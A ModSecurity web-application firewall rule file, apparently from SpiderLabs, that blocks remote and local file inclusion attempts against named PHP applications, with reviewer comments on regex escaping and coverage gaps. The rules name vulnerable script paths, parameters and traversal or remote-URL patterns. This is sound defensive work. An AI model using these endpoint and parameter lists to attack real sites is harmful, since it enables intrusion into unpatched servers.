SecRule &TX:'/RFI.*ARGS:editform/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpAddEdit editform parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010485) SpiderLabs Research (SLR) Public 
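Vulns: ET WEB_SPECIFIC_APPS phptraverse mp3_id.php GLOBALS Parameter Remote File Inclusion Attempt
# The TX selector between the slashes is a regular expression. The brackets of
# the parameter name are escaped so the literal name GLOBALS[BASE] is matched;
# unescaped, "[BASE]" is a character class and the real name would not satisfy
# the pattern, leaving the rule silent.
SecRule REQUEST_LINE "@contains /assets/plugins/mp3_id/mp3_id.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010485,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS phptraverse mp3_id.php GLOBALS Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/phptraverse-rfi.txt'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:GLOBALS\[BASE\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phptraverse mp3_id.php GLOBALS Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009085) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion
# Here ARGS:apps_path[plug] selects the argument by its literal name (no
# slashes, so no regular expression), and the value is tested for "../".
# NOTE(review): the final link names no t: transformations of its own; confirm
# what it inherits, since "@contains ../" only sees forward-slash traversal.
SecRule REQUEST_LINE "@contains /plugin/gateway/gnokii/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009085,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:apps_path[plug] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path plug parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter remote file inclusion
SecRule REQUEST_LINE "@contains /plugin/themes/default/init.php"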
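"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009086,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter remote file inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
# The TX selector between the slashes is a regular expression. The brackets of
# the parameter name are escaped so the literal name apps_path[themes] is
# matched; unescaped, "[themes]" is a character class and the real name would
# not satisfy the pattern.
SecRule &TX:'/RFI.*ARGS:apps_path\[themes\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion
# Here ARGS:apps_path[themes] selects the argument by its literal name, and the
# value is tested for "../".
# NOTE(review): the final link names no t: transformations of its own; confirm
# what it inherits, since "@contains ../" only sees forward-slash traversal.
SecRule REQUEST_LINE "@contains /plugin/themes/default/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009087,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:apps_path[themes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS init.php apps_path themes parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009088) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter remote file inclusion
# The brackets in the TX key pattern are escaped for the same reason as in id
# 2009086: the selector is a regular expression and the name apps_path[libs]
# must be matched literally.
SecRule REQUEST_LINE "@contains /lib/function.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009088,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter remote file inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:apps_path\[libs\]/' "@gt 0"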
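"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009089) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion
# ARGS:apps_path[libs] selects the argument by its literal name, and the value
# is tested for "../".
# NOTE(review): the final link names no t: transformations of its own; confirm
# what it inherits, since "@contains ../" only sees forward-slash traversal.
SecRule REQUEST_LINE "@contains /lib/function.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009089,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:apps_path[libs] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS playSMS function.php apps_path libs parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009887) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ProjectButler RFI attempt
# Single rule, no chain: a substring test of the request line. @contains takes
# its argument literally, so the backslash that preceded ":" was part of the
# text searched for, and t:normalisePathWin rewrites backslashes in the input;
# the pattern is therefore written as plain "http:" so the rule can match.
# NOTE(review): only the "http:" scheme in the offset parameter is covered.
SecRule REQUEST_LINE "@contains /pda_projects.php?offset=http:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009887,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ProjectButler RFI attempt ',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0908-exploits/projectbutler-rfi.txt',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ProjectButler RFI attempt ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009320) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion
SecRule REQUEST_LINE "@contains /_footer.php"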
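"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009320,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33621'"
SecRule REQUEST_LINE "@contains GET " "chain"
# NOTE(review): this link names no t: transformations of its own; confirm what
# it inherits, since "@contains ../" only sees forward-slash traversal.
SecRule ARGS:skin_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS rgboard _footer.php skin_path parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009321) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS rgboard footer.php _path parameter remote file inclusion
# The TX selector between the slashes is a regular expression. The brackets of
# the parameter name are escaped so the literal name _path[counter] is matched;
# unescaped, "[counter]" is a character class and the real name would not
# satisfy the pattern.
# NOTE(review): "/footer.php" is a substring test and does not match
# "/_footer.php"; the two rgboard rules therefore cover different paths.
SecRule REQUEST_LINE "@contains /footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009321,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS rgboard footer.php _path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,33621'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:_path\[counter\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS rgboard footer.php _path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009331) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion
# ARGS:config[template] selects the argument by its literal name, and the value
# is tested for "../".
SecRule REQUEST_LINE "@contains /templater.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009331,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS tinyCMS templater.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30785'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:config[template] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS tinyCMS 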
templater.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009416) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS txtSQL startup.php CFG Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /startup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009416,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS txtSQL startup.php CFG Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30625'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CFG[txtsql][class]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS txtSQL startup.php CFG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003670) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Workbench Survival Guide Remote Inclusion Attempt -- headerfile.php path SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003670,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Workbench Survival Guide Remote Inclusion Attempt -- headerfile.php path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3848'" SecRule &TX:'/RFI.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Workbench Survival Guide Remote Inclusion Attempt -- headerfile.php path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000358) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS BASE base_include.inc.php remote file include SecRule QUERY_STRING|REQUEST_BODY "@contains /base_include.inc.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000358,rev:4,msg:'SLR: GPL WEB_SPECIFIC_APPS BASE base_include.inc.php remote file include',tag:'web-application-attack'" SecRule QUERY_STRING|REQUEST_BODY "@contains BASE_path=" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:BASE_path=(https?|ftp))" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS BASE base_include.inc.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000356) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS BASE base_qry_common.php remote file include SecRule REQUEST_LINE "@contains /base_qry_common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000356,rev:2,msg:'SLR: GPL WEB_SPECIFIC_APPS BASE base_qry_common.php remote file include',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:BASE_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS BASE base_qry_common.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000357) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS BASE base_stat_common.php remote file include SecRule REQUEST_LINE "@contains /base_stat_common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000357,rev:2,msg:'SLR: GPL WEB_SPECIFIC_APPS BASE base_stat_common.php remote file include',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:BASE_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS BASE base_stat_common.php remote file 
include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000730) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog BlackList.Examine.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/BlackList.Examine.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000730,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog BlackList.Examine.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog BlackList.Examine.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000731) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog DeleteComment.Action.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/DeleteComment.Action.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000731,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog DeleteComment.Action.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog DeleteComment.Action.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000737) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog EditHeader.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/EditHeader.Admin.class.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000737,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog EditHeader.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog EditHeader.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000738) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog EditIP.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/EditIP.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000738,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog EditIP.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog EditIP.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000732) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog EditIPofURL.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/EditIPofURL.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000732,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog EditIPofURL.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog EditIPofURL.Admin.class.php remote file 
include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000739) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog IPofUrl.Examine.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/IPofUrl.Examine.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000739,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog IPofUrl.Examine.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog IPofUrl.Examine.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000740) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog Import.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/Import.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000740,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog Import.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog Import.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000741) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog LogView.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/LogView.Admin.class.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000741,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog LogView.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog LogView.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000733) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MTBlackList.Examine.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MTBlackList.Examine.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000733,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MTBlackList.Examine.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MTBlackList.Examine.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000735) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MailAdmin.Action.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MailAdmin.Action.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000735,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MailAdmin.Action.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MailAdmin.Action.class.php remote file 
include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000736) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MassDelTrackback.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MassDelTrackback.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000736,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MassDelTrackback.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MassDelTrackback.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000734) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog MassDelete.Admin.class.php remote file include SecRule REQUEST_LINE "@contains plugins/spamx/MassDelete.Admin.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000734,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog MassDelete.Admin.class.php remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog MassDelete.Admin.class.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000728) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include SecRule REQUEST_LINE "@contains plugins/links/functions.inc" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000728,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000729) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include SecRule REQUEST_LINE "@contains plugins/polls/functions.inc" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000729,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (100000742) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include SecRule REQUEST_LINE "@contains plugins/staticpages/functions.inc" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000742,rev:3,msg:'SLR: GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',tag:'web-application-attack',tag:'bugtraq,18740'" SecRule &TX:'/RFI.*ARGS:$_CONF[path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS Geeklog functions.inc remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # 
(100000908) SpiderLabs Research (SLR) Public Vulns: GPL WEB_SPECIFIC_APPS WEB-PHP phpMyWebmin create_file script remote file include SecRule REQUEST_LINE "@contains create_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:100000908,rev:1,msg:'SLR: GPL WEB_SPECIFIC_APPS WEB-PHP phpMyWebmin create_file script remote file include',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20281/info'" SecRule &TX:'/RFI.*ARGS:target/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=GPL WEB_SPECIFIC_APPS WEB-PHP phpMyWebmin create_file script remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dompdf dompdf.php input_file Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /dompdf.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011565,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dompdf dompdf.php input_file Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:input_file/' "@gt 0" 